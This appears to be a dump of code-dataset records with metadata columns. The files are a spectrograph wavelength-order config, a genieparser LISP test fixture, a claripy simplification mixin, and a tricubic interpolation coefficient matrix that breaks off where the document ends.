                    16: np.array([+0.0000002462, -0.0002856080, +2.5831334692])}
                }
            }
        # Pixel-cut bounds per band and order: [left cut, right cut].
        self.bound_cut_dic = { 'H':{
                                 6: [425, 200],
                                 10: [250, 150],
                                 11: [600, 150],
                                 #13: [200, 600],
                                 13: [250, 750],
                                 14: [750, 100],
                                 16: [530, 100],
                                 17: [1000,100],
                                 20: [500, 150],
                                 21: [200, 150],
                                 22: [200, 150]},
                               'K':{
                                 3: [150, 1350],
                                 13: [200, 400],
                                 14: [200, 400]}
                               }
class orderdict_cla:
    # Lookup table of per-order wavelength ranges [start, end], keyed by
    # band ('H'/'K') then echelle order number.  Values look like microns
    # -- TODO confirm against how orderdict is consumed.  Commented-out
    # entries are orders deliberately excluded from processing.
    def __init__(self,):
        self.orderdict = { 'H':{1: [1.79350, 1.81560],
                                2: [1.77602, 1.79791],
                                3: [1.75889, 1.78058],
                                4: [1.74211, 1.76360],
                                5: [1.72565, 1.74694],
                                6: [1.70952, 1.73061],
                                # 7: [1.69811, 1.71032],
                                # 8: [1.68255, 1.69465],
                                # 9: [1.66729, 1.67928],
                                10: [1.64928, 1.66785],
                                11: [1.63880, 1.65301],
                                # 12: [1.62320, 1.63487],
                                13: [1.60548, 1.61957],
                                14: [1.59742, 1.61061],
                                # 15: [1.58149, 1.59284],
                                16: [1.56694, 1.58328],
                                17: [1.56034, 1.56997],
                                # 18: [1.54197, 1.55303],
                                # 19: [1.52926, 1.54022],
                                20: [1.51677, 1.53096],
                                21: [1.50060, 1.51902],
                                22: [1.48857, 1.50682],
                                # 23: [1.47673, 1.49483],
                                # 24: [1.46510, 1.48303],
                                25: [1.45366, 1.47143]},
                           'K':{1: [2.45317, 2.48280],
                                2: [2.41999, 2.44928],
                                3: [2.38771, 2.41667],
                                4: [2.35630, 2.38493],
                                5: [2.32573, 2.35402],
                                6: [2.29596, 2.32393],
                                7: [2.26696, 2.29461],
                                8: [2.23870, 2.26603],
                                # 9: [2.21115, 2.23817],
                                10: [2.18429, 2.21101],
                                11: [2.15891, 2.18451],
                                12: [2.14410, 2.15604],
                                13: [2.10840, 2.12953],
                                14: [2.08326, 2.10624],
                                # 15: [2.05948, 2.08471],
                                16: [2.03627, 2.06121],
                                # 17: [2.01358, 2.03825],
                                # 18: [1.99142, 2.01580],
                                19: [1.96975, 1.99386],
                                20: [1.94857, 1.97241],
                                21: [1.92785, 1.95143],
                                22: [1.90759, 1.93090],
                                23: [1.88777, 1.91082],
                                24: [1.86837, 1.89116],
                                25: [1.84939, 1.87192]}
                           }
class tagstuffs:
    """Per-tag container for a single night's data products, passed
    between the main code and the fitting routines (see module header).

    All constructor arguments are stored verbatim as attributes of the
    same name.
    """

    def __init__(self, night, watm, satm, a0contwave, continuum, ip):
        self.night = night
        self.watm = watm
        self.satm = satm
        self.a0contwave = a0contwave
        self.continuum = continuum
        self.ip = ip
| 69.286863
| 142
| 0.363798
| 2,170
| 25,844
| 4.31106
| 0.221659
| 0.122715
| 0.140246
| 0.015393
| 0.810689
| 0.8
| 0.8
| 0.787173
| 0.787173
| 0.7752
| 0
| 0.522094
| 0.507004
| 25,844
| 372
| 143
| 69.473118
| 0.21215
| 0.028517
| 0
| 0.711712
| 0
| 0
| 0.001355
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015015
| false
| 0
| 0.003003
| 0
| 0.033033
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
16e053d1824c248dc6a2f044c5bf870a68dc933f
| 2,615
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/cli/equal/golden_output5_expected.py
|
ykoehler/genieparser
|
b62cf622c3d8eab77c7b69e932c214ed04a2565a
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/cli/equal/golden_output5_expected.py
|
ykoehler/genieparser
|
b62cf622c3d8eab77c7b69e932c214ed04a2565a
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/cli/equal/golden_output5_expected.py
|
ykoehler/genieparser
|
b62cf622c3d8eab77c7b69e932c214ed04a2565a
|
[
"Apache-2.0"
] | null | null | null |
# Expected parsed structure for this golden-output test case: a nested dict
# keyed lisp_id -> site_name -> instance_id -> eid_prefix, with each EID
# prefix carrying its last-registration time, the registering RLOC, and an
# up/down flag.  This must match the parser's output byte-for-byte, so do
# not edit values here without updating the corresponding device output.
expected_output = {
    'lisp_id': {
        0: {
            'site_name': {
                'Shire': {
                    'instance_id': {
                        4100: {
                            'eid_prefix': {
                                '192.168.1.0/24': {
                                    'last_registered': 'never',
                                    'who_last_registered': '--',
                                    'up': 'no'
                                },
                                '192.168.1.71/32': {
                                    'last_registered': '00:50:10',
                                    'who_last_registered': '11.11.11.11:33079',
                                    'up': 'yes'
                                },
                                '194.168.1.0/24': {
                                    'last_registered': 'never',
                                    'who_last_registered': '--',
                                    'up': 'no'
                                },
                                '194.168.1.72/32': {
                                    'last_registered': '00:50:06',
                                    'who_last_registered': '22.22.22.22:27643',
                                    'up': 'yes'
                                },
                                '2001:192:168:1::/64': {
                                    'last_registered': 'never',
                                    'who_last_registered': '--',
                                    'up': 'no'
                                },
                                '2001:192:168:1::71/128': {
                                    'last_registered': '00:50:10',
                                    'who_last_registered': '11.11.11.11:33079',
                                    'up': 'yes'
                                },
                                '2001:194:168:1::/64': {
                                    'last_registered': 'never',
                                    'who_last_registered': '--',
                                    'up': 'no'
                                },
                                '2001:194:168:1::72/128': {
                                    'last_registered': '00:50:06',
                                    'who_last_registered': '22.22.22.22:27643',
                                    'up': 'yes'
                                }
                            }
                        }
                    }
                }
            }
        }
    }
}
| 46.696429
| 79
| 0.216444
| 147
| 2,615
| 3.653061
| 0.258503
| 0.417132
| 0.253259
| 0.163873
| 0.789572
| 0.77095
| 0.77095
| 0.77095
| 0.77095
| 0.77095
| 0
| 0.211696
| 0.67304
| 2,615
| 56
| 80
| 46.696429
| 0.416374
| 0
| 0
| 0.428571
| 0
| 0
| 0.236239
| 0.01682
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
bcbfd65032df6b8fb40ce045b04448525639dd27
| 630
|
py
|
Python
|
claripy/frontend_mixins/simplify_helper_mixin.py
|
embg/claripy
|
1a5e0ca61d3f480e541226f103900e983f025e4a
|
[
"BSD-2-Clause"
] | 211
|
2015-08-06T23:25:01.000Z
|
2022-03-26T19:34:49.000Z
|
claripy/frontend_mixins/simplify_helper_mixin.py
|
embg/claripy
|
1a5e0ca61d3f480e541226f103900e983f025e4a
|
[
"BSD-2-Clause"
] | 175
|
2015-09-03T11:09:18.000Z
|
2022-03-09T20:24:33.000Z
|
claripy/frontend_mixins/simplify_helper_mixin.py
|
embg/claripy
|
1a5e0ca61d3f480e541226f103900e983f025e4a
|
[
"BSD-2-Clause"
] | 99
|
2015-08-07T10:30:08.000Z
|
2022-03-26T10:32:09.000Z
|
class SimplifyHelperMixin:
    """Mixin that calls ``self.simplify()`` before delegating certain
    queries to the next class in the MRO.

    ``max`` and ``min`` always simplify first; ``eval`` and ``batch_eval``
    simplify only when more than one solution is requested (n > 1) --
    presumably because a single-solution query is cheap enough that the
    simplification pass is not worth it (TODO confirm intent).

    Idiom fix: the legacy two-argument ``super(SimplifyHelperMixin, self)``
    calls were replaced with the equivalent Python 3 zero-argument
    ``super()`` -- no behavior change.
    """

    def max(self, *args, **kwargs):
        self.simplify()
        return super().max(*args, **kwargs)

    def min(self, *args, **kwargs):
        self.simplify()
        return super().min(*args, **kwargs)

    def eval(self, e, n, *args, **kwargs):
        # Only simplify when multiple solutions (n > 1) are requested.
        if n > 1:
            self.simplify()
        return super().eval(e, n, *args, **kwargs)

    def batch_eval(self, e, n, *args, **kwargs):
        # Same n > 1 guard as eval.
        if n > 1:
            self.simplify()
        return super().batch_eval(e, n, *args, **kwargs)
| 33.157895
| 81
| 0.590476
| 74
| 630
| 5
| 0.22973
| 0.216216
| 0.194595
| 0.248649
| 0.789189
| 0.702703
| 0.702703
| 0.702703
| 0.702703
| 0.378378
| 0
| 0.004264
| 0.255556
| 630
| 18
| 82
| 35
| 0.784648
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.266667
| false
| 0
| 0
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
4c5526805bc2825ad64bb6691eb1554b2dad103f
| 12,582
|
py
|
Python
|
python/coefs.py
|
mustafabar/RedSeaInterpolation
|
5d40cbc6e54df7a867445e8fadd11f9f1cce8556
|
[
"MIT"
] | null | null | null |
python/coefs.py
|
mustafabar/RedSeaInterpolation
|
5d40cbc6e54df7a867445e8fadd11f9f1cce8556
|
[
"MIT"
] | null | null | null |
python/coefs.py
|
mustafabar/RedSeaInterpolation
|
5d40cbc6e54df7a867445e8fadd11f9f1cce8556
|
[
"MIT"
] | null | null | null |
import numpy as np
# 64x64 integer coefficient matrix for cubic interpolation.
# NOTE(review): the structure — rows formed from corner values, first
# derivatives and cross-derivatives, with the characteristic -27/27 and
# 18/-18 blocks — looks like the standard tricubic interpolation matrix
# (Lekien & Marsden style), mapping the 64 corner values/derivatives of a
# cell onto the 64 polynomial coefficients. TODO: confirm against how `A`
# is consumed elsewhere in this repository.
# Entries are exact integers; do not edit by hand.
A = np.array([
[ 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[-3, 3, 0, 0, 0, 0, 0, 0,-2,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 2,-2, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[-3, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0,-3, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 9,-9,-9, 9, 0, 0, 0, 0, 6, 3,-6,-3, 0, 0, 0, 0, 6,-6, 3,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[-6, 6, 6,-6, 0, 0, 0, 0,-3,-3, 3, 3, 0, 0, 0, 0,-4, 4,-2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-2,-1,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 2, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 2, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[-6, 6, 6,-6, 0, 0, 0, 0,-4,-2, 4, 2, 0, 0, 0, 0,-3, 3,-3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-1,-2,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 4,-4,-4, 4, 0, 0, 0, 0, 2, 2,-2,-2, 0, 0, 0, 0, 2,-2, 2,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 3, 0, 0, 0, 0, 0, 0,-2,-1, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2,-2, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0,-1, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9,-9,-9, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 3,-6,-3, 0, 0, 0, 0, 6,-6, 3,-3, 0, 0, 0, 0, 4, 2, 2, 1, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-6, 6, 6,-6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3,-3, 3, 3, 0, 0, 0, 0,-4, 4,-2, 2, 0, 0, 0, 0,-2,-2,-1,-1, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-6, 6, 6,-6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-4,-2, 4, 2, 0, 0, 0, 0,-3, 3,-3, 3, 0, 0, 0, 0,-2,-1,-2,-1, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4,-4,-4, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 2,-2,-2, 0, 0, 0, 0, 2,-2, 2,-2, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0],
[-3, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0, 0, 0,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0,-3, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0, 0, 0,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 9,-9, 0, 0,-9, 9, 0, 0, 6, 3, 0, 0,-6,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6,-6, 0, 0, 3,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 2, 0, 0, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[-6, 6, 0, 0, 6,-6, 0, 0,-3,-3, 0, 0, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-4, 4, 0, 0,-2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-2, 0, 0,-1,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0, 0, 0,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0, 0, 0,-1, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9,-9, 0, 0,-9, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 3, 0, 0,-6,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6,-6, 0, 0, 3,-3, 0, 0, 4, 2, 0, 0, 2, 1, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-6, 6, 0, 0, 6,-6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3,-3, 0, 0, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-4, 4, 0, 0,-2, 2, 0, 0,-2,-2, 0, 0,-1,-1, 0, 0],
[ 9, 0,-9, 0,-9, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0, 3, 0,-6, 0,-3, 0, 6, 0,-6, 0, 3, 0,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 2, 0, 2, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 9, 0,-9, 0,-9, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0, 3, 0,-6, 0,-3, 0, 6, 0,-6, 0, 3, 0,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 2, 0, 2, 0, 1, 0],
[-27,27,27,-27,27,-27,-27,27,-18,-9,18, 9,18, 9,-18,-9,-18,18,-9, 9,18,-18, 9,-9,-18,18,18,-18,-9, 9, 9,-9,-12,-6,-6,-3,12, 6, 6, 3,-12,-6,12, 6,-6,-3, 6, 3,-12,12,-6, 6,-6, 6,-3, 3,-8,-4,-4,-2,-4,-2,-2,-1],
[18,-18,-18,18,-18,18,18,-18, 9, 9,-9,-9,-9,-9, 9, 9,12,-12, 6,-6,-12,12,-6, 6,12,-12,-12,12, 6,-6,-6, 6, 6, 6, 3, 3,-6,-6,-3,-3, 6, 6,-6,-6, 3, 3,-3,-3, 8,-8, 4,-4, 4,-4, 2,-2, 4, 4, 2, 2, 2, 2, 1, 1],
[-6, 0, 6, 0, 6, 0,-6, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 0,-3, 0, 3, 0, 3, 0,-4, 0, 4, 0,-2, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0,-2, 0,-1, 0,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0,-6, 0, 6, 0, 6, 0,-6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 0,-3, 0, 3, 0, 3, 0,-4, 0, 4, 0,-2, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0,-2, 0,-1, 0,-1, 0],
[18,-18,-18,18,-18,18,18,-18,12, 6,-12,-6,-12,-6,12, 6, 9,-9, 9,-9,-9, 9,-9, 9,12,-12,-12,12, 6,-6,-6, 6, 6, 3, 6, 3,-6,-3,-6,-3, 8, 4,-8,-4, 4, 2,-4,-2, 6,-6, 6,-6, 3,-3, 3,-3, 4, 2, 4, 2, 2, 1, 2, 1],
[-12,12,12,-12,12,-12,-12,12,-6,-6, 6, 6, 6, 6,-6,-6,-6, 6,-6, 6, 6,-6, 6,-6,-8, 8, 8,-8,-4, 4, 4,-4,-3,-3,-3,-3, 3, 3, 3, 3,-4,-4, 4, 4,-2,-2, 2, 2,-4, 4,-4, 4,-2, 2,-2, 2,-2,-2,-2,-2,-1,-1,-1,-1],
[ 2, 0, 0, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
